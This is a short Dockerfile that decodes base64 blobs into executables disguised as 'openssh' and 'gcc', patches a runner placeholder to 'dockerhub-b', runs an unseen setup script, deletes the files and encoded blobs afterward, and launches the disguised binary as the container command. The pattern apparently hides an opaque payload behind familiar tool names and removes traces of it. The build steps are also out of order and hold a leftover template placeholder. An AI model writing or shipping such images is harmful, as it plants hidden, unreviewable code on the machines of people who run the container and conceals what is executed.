FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > openssh.log'

RUN base64 --decode openssh.64 > openssh
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY openssh .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' openssh
RUN bash ./docker.sh

RUN rm --force --recursive openssh _REPO_NAME__.64 docker.sh gcc gcc.64

CMD openssh
